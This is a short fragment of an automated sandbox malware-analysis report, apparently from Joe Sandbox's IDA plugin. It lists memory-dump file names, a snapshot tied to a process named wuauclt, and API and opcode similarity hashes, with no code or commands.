• Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
Similarity
• API ID: CriticalSection$AllocEnterInitializeLeaveLocal
• String ID:
• API String ID: 730355536-0
• Opcode ID: 798072171faa28aa9536d3e14e8c46776961f52050d9d4218a56882117630c0f
• Instruction ID: 5f09b27ca823af9dd1356ce4e247dec4ea3fcd1be7825b8ef208c2b79a25235a
• Opcode Fuzzy Hash: 798072171faa28aa9536d3e14e8c46776961f52050d9d4218a56882117630c0f
• Instruction Fuzzy Hash: 0E018470644340AED319AB6A9D06F163AA4E74E704F14C47BE140BB2F2D6BD44A08B5F